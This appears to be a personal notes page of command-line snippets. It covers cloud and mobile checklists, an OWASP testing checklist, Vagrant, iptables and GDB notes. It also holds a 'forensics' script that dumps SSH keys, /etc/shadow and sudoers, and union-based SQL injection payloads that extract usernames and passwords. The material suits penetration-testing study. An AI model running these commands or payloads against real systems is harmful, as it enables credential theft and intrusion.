Where mostly command line snippets go that I either find useful, always forget, or think others can benefit from. There's also some notes that isn't code.

Cloud Engineering Checklists

Cloud Engineering Checklists  
============================

Backend  
-------
B1: Security for user/customer  
B2: Security for the business  
B3: Low battery usage design (not polling)  
B4: Responsive experience for mobile users  
B5: Works!  
B6: Simple development for iOS development  
B7: Easy development for backend dev  
B8: Scalable  
B9: Extendable  
B10: Can provide public api?  
B11: API is versioned in the URI?

Mobile App  
----------
M1: Provide visual feedback  
M2: Make tasks more convenient  
M3: Make the user better informed  
M4: Backward compatible  
M5: Work properly  
M6: Bugs are fixed quickly  
M7: Follow GUI conventions  
M8: Launch quickly  
M9: Responsive  
M10: Limited computer resources used  
M11: Enduring. Users use daily  
M12: Professional quality icon  
M13: Intuitive to use  
M14: High quality graphics  
M15: Accessible to persons with disabilities  
M16: Viral. Users want to share it  
M17: Localized to each region it's used in  
M18: Better performance, capatabilities, ease-of-use, and design than competitors  
M19: Does not request excessive permissions  
M20: Runs optimally across all devices  
M21: Single sign on or easy account creation via phone #

Mobile Security Risks  
---------------------
S1: Weak Server Side Controls  
S2: Insecure Data Storage  
S3: Insufficient Transport Layer Protection  
S4: Unintended Data Leakage  
S5: Poor Authorization and Authentication  
S6: Broken Cryptography  
S7: Client Side Injection  
S8: Security Decisions Via Untrusted Inputs  
S9: Improper Session Handling  
S10: Lack of Binary Protections  

Web Security Exploitation Check List

Web Security Exploitation Check List  
Taken from OWASP

[+] Information Gathering

Manually explore the site  
Spider/crawl for missed or hidden content  
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store  
Check the caches of major search engines for publicly accessible sites  
Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)  
Perform Web Application Fingerprinting  
Identify technologies used  
Identify user roles  
Identify application entry points  
Identify client-side code  
Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)  
Identify co-hosted and related applications  
Identify all hostnames and ports  
Identify third-party hosted content

[+] Configuration Management

Check for commonly used application and administrative URLs  
Check for old, backup and unreferenced files  
Check HTTP methods supported and Cross Site Tracing (XST)  
Test file extensions handling  
Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)  
Test for policies (e.g. Flash, Silverlight, robots)  
Test for non-production data in live environment, and vice-versa  
Check for sensitive data in client-side code (e.g. API keys, credentials)

[+] Secure Transmission

Check SSL Version, Algorithms, Key length  
Check for Digital Certificate Validity (Duration, Signature and CN)  
Check credentials only delivered over HTTPS  
Check that the login form is delivered over HTTPS  
Check session tokens only delivered over HTTPS  
Check if HTTP Strict Transport Security (HSTS) in use

[+] Authentication

Test for user enumeration  
Test for authentication bypass  
Test for bruteforce protection  
Test password quality rules  
Test remember me functionality  
Test for autocomplete on password forms/input  
Test password reset and/or recovery  
Test password change process  
Test CAPTCHA  
Test multi factor authentication  
Test for logout functionality presence  
Test for cache management on HTTP (eg Pragma, Expires, Max-age)  
Test for default logins  
Test for user-accessible authentication history  
Test for out-of channel notification of account lockouts and successful password changes  
Test for consistent authentication across applications with shared authentication schema / SSO

[+] Session Management

Establish how session management is handled in the application (eg, tokens in cookies, token in URL)  
Check session tokens for cookie flags (httpOnly and secure)  
Check session cookie scope (path and domain)  
Check session cookie duration (expires and max-age)  
Check session termination after a maximum lifetime  
Check session termination after relative timeout  
Check session termination after logout  
Test to see if users can have multiple simultaneous sessions  
Test session cookies for randomness  
Confirm that new session tokens are issued on login, role change and logout  
Test for consistent session management across applications with shared session management  
Test for session puzzling  
Test for CSRF and clickjacking

[+] Authorization

Test for path traversal  
Test for bypassing authorization schema  
Test for vertical Access control problems (a.k.a. Privilege Escalation)  
Test for horizontal Access control problems (between two users at the same privilege level)  
Test for missing authorization

[+] Data Validation

Test for Reflected Cross Site Scripting  
Test for Stored Cross Site Scripting  
Test for DOM based Cross Site Scripting  
Test for Cross Site Flashing  
Test for HTML Injection  
Test for SQL Injection  
Test for LDAP Injection  
Test for ORM Injection  
Test for XML Injection  
Test for XXE Injection  
Test for SSI Injection  
Test for XPath Injection  
Test for XQuery Injection  
Test for IMAP/SMTP Injection  
Test for Code Injection  
Test for Expression Language Injection  
Test for Command Injection  
Test for Overflow (Stack, Heap and Integer)  
Test for Format String  
Test for incubated vulnerabilities  
Test for HTTP Splitting/Smuggling  
Test for HTTP Verb Tampering  
Test for Open Redirection  
Test for Local File Inclusion  
Test for Remote File Inclusion  
Compare client-side and server-side validation rules  
Test for NoSQL injection  
Test for HTTP parameter pollution  
Test for auto-binding  
Test for Mass Assignment  
Test for NULL/Invalid Session Cookie

[+] Denial of Service

Test for anti-automation  
Test for account lockout  
Test for HTTP protocol DoS  
Test for SQL wildcard DoS

[+] Business Logic

Test for feature misuse  
Test for lack of non-repudiation  
Test for trust relationships  
Test for integrity of data  
Test segregation of duties

[+] Cryptography

Check if data which should be encrypted is not  
Check for wrong algorithms usage depending on context  
Check for weak algorithms usage  
Check for proper use of salting  
Check for randomness functions

[+] Risky Functionality - File Uploads

Test that acceptable file types are whitelisted  
Test that file size limits, upload frequency and total file counts are defined and are enforced  
Test that file contents match the defined file type  
Test that all file uploads have Anti-Virus scanning in-place.  
Test that unsafe filenames are sanitised  
Test that uploaded files are not directly accessible within the web root  
Test that uploaded files are not served on the same hostname/port  
Test that files and other media are integrated with the authentication and authorisation schemas

[+] Risky Functionality - Card Payment

Test for known vulnerabilities and configuration issues on Web Server and Web Application  
Test for default or guessable password  
Test for non-production data in live environment, and vice-versa  
Test for Injection vulnerabilities  
Test for Buffer Overflows  
Test for Insecure Cryptographic Storage  
Test for Insufficient Transport Layer Protection  
Test for Improper Error Handling  
Test for all vulnerabilities with a CVSS v2 score > 4.0  
Test for Authentication and Authorization issues  
Test for CSRF

[+] HTML 5

Test Web Messaging  
Test for Web Storage SQL injection  
Check CORS implementation  
Check Offline Web Application  

Quick Vagrant LAMP Server

# -*- mode: ruby -*- vi: set ft=ruby :

$bootstrap = <<SCRIPT
sudo apt-get update  
sudo apt-get install -y git  
sudo apt-get install -y apache2  
sudo debconf-set-selections <<< 'mysql-server mysql-server/root_password password root'  
sudo debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password root'  
sudo apt-get install -y mysql-server libapache2-mod-auth-mysql php5-mysql  
#sudo mysql_install_db
#sudo /usr/bin/mysql_secure_installation
sudo apt-get install -y php5 libapache2-mod-php5 php5-mcrypt  
SCRIPT

$server_copy = <<SCRIPT
sudo cp -R ~/server/* /var/www/html/  
SCRIPT

Vagrant.configure(2) do |config|  
  config.vm.box = "ubuntu/trusty64"
  config.vm.hostname = "lamp-server"
  config.vm.network "forwarded_port", guest: 80, host: 8080
  config.vm.provider "virtualbox" do |v|
    v.memory = 1024
  end
  config.vm.provision "shell", privileged: false, inline: $bootstrap
  config.vm.provision "file", source: "./server", destination: "./server"
  config.vm.provision "shell", privileged: false, inline: $server_copy
end  

Add a swap file

Note that this is only valid for the current session, and is not persistent between restarts.

sudo fallocate -l 4G /swapfile  
sudo chmod 600 /swapfile  
sudo mkswap /swapfile  
sudo swapon /swapfile  
sudo sysctl vm.swappiness=10  
sudo sysctl vm.vfs_cache_pressure=50  

If you want persistence, then do the above plus this:

sudo bash -c "echo '/swapfile   none    swap    sw    0   0' >> /etc/fstab"  
sudo bash -c "echo 'vm.swappiness=10' >> /etc/sysctl.conf"  
sudo bash -c "echo 'vm.vfs_cache_pressure = 50' >> /etc/sysctl.conf"  

Git flow basics

git checkout -b contact-form  
(do your work on "contact-form")
git status  
git commit -am  "updated form in contact module"  
git checkout master  
git merge --no-ff contact-form  
git branch -d contact-form  
git push origin master  

Disable IP and turn off NAT

This fixes Android Studio not wanting to work when the opposite is true.

sudo iptables -t nat -F  
sudo sysctl -w net.ipv4.ip_forward=0;  

Convert assembly to the hexcode

rasm2 -a x86 -b 64 'jmp $+0x1000'  

Universal extract

extract () {  
    if [ -f $1 ]; then
        case $1 in
            *.tar.bz2)  tar -jxvf $1                        ;;
            *.tar.gz)   tar -zxvf $1                        ;;
            *.bz2)      bunzip2 $1                          ;;
            *.dmg)      hdiutil mount $1                    ;;
            *.gz)       gunzip $1                           ;;
            *.tar)      tar -xvf $1                         ;;
            *.tbz2)     tar -jxvf $1                        ;;
            *.tgz)      tar -zxvf $1                        ;;
            *.zip)      unzip $1                            ;;
            *.ZIP)      unzip $1                            ;;
            *.pax)      cat $1 | pax -r                     ;;
            *.pax.Z)    uncompress $1 --stdout | pax -r     ;;
            *.Z)        uncompress $1                       ;;
            *)          echo "'$1' cannot be extracted/mounted via extract()" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
}

Replace non-printables with dots

cat file.log | tr '[\000-\011\013-\037\177-\377]' '.' | grep t...e..s..t  

Forward and NAT to the vboxnet0 interface

sudo iptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT;  
sudo iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT;  
sudo iptables -A POSTROUTING -t nat -j MASQUERADE;  
sudo sysctl -w net.ipv4.ip_forward=1;  

Forward DNS queries from vboxnet0 to OpenDNS

iptables -t nat -A PREROUTING -i vboxnet0 -p udp --dport 53 -j DNAT --to 208.67.222.222:53  
iptables -t nat -A PREROUTING -i vboxnet0 -p tcp --dport 53 -j DNAT --to 208.67.222.222:53  

Mount a shared drive on a vbox guest

sudo mount -t vboxsf share ~/host  

Disable external monitor (incase something's glitched)

xrandr --output eDP1 --off  

Quick Linux forensics

Usage: forensics.sh > out.log

#!/bin/bash
# Version information
echo "VERSION INFORMATION - GREP FOR ME"  
lsb_release -a; uname -a

# Any sweet files?
echo "FILE INFORMATION - GREP FOR ME"  
cat ~/.*; cat ~/.ssh/*; cat /etc/ssh/*; cat /etc/*conf  
cat /etc/passwd; cat /etc/group; cat /etc/shadow; cat /etc/sudoers  
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null  
ls -alh /var/log; ls -alhR /var/www/  
cat /var/log/apache2/*; cat /var/log/auth.log; cat /var/log/httpd/*; cat /var/log/syslog

# What's running or installed?
echo "INSTALL INFORMATION - GREP FOR ME"  
ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l  
ps aux; lsof -i; netstat -tulpn; last; w

# How's this thing even working
echo "SERVER INFORMATION - GREP FOR ME"  
mount; df -h; cat /etc/fstab; ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network  
cat /etc/resolv.conf; cat /etc/sysconfig/network; cat /etc/networks; iptables -L  
crontab -l;  

Union based SQL injection

' or 1=1#  
1' ORDER BY 10#  
1' UNION SELECT version(),2#  
1' UNION SELECT version(),database()#  
1' UNION SELECT version(),user()#  
1' UNION ALL SELECT table_name,2 from information_schema.tables#  
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#  
1' UNION ALL SELECT concat(user,char(58),password),2 from users#  

PEDA GDB Notes

Useful commands

  • assemble - convert asm to hex
  • checksec - list security options of binary
  • context - list full context info
  • deactive <function> - ignore section of a function (unsure if it fixes stack, or just simple jmp?)
  • distance < addr1> < addr2> - quick hex math
  • dumpmem - dump raw memory of a region to a file
  • elfsymbol - print elf symbol names
  • goto <addr>- continue execution at < addr>
  • hexdump <addr> <count> - print hex bytes at
  • hexprint <addr> <count> - hexdump in C-string format
  • nearpc <count> - print count instructions near pc
  • patch <addr> - replace memory at with
  • procinfo - print fd and pid from /proc/{pid}
  • pattern create <size> - generate cyclic pattern
  • pdisass <addr> - pretty dissassemble at address
  • readelf - get ELF headers
  • searchmem - search for pattern in memory
  • session save <filename> - save debug session to
  • session restore <filename> - restore debug session from
  • strings - print ascii strings in memory
  • telescope <addr> - print memory at address w/ smart derefs
  • tracecall - continue, and print (trace) executed function calls
  • unptrace - disable ptrace anti-debugger
  • vmmap - list virtual memory mappings
  • xormem <start> <end> <key> - cyclic XOR a mem region w/ a key
  • xrefs - list xrefs to a function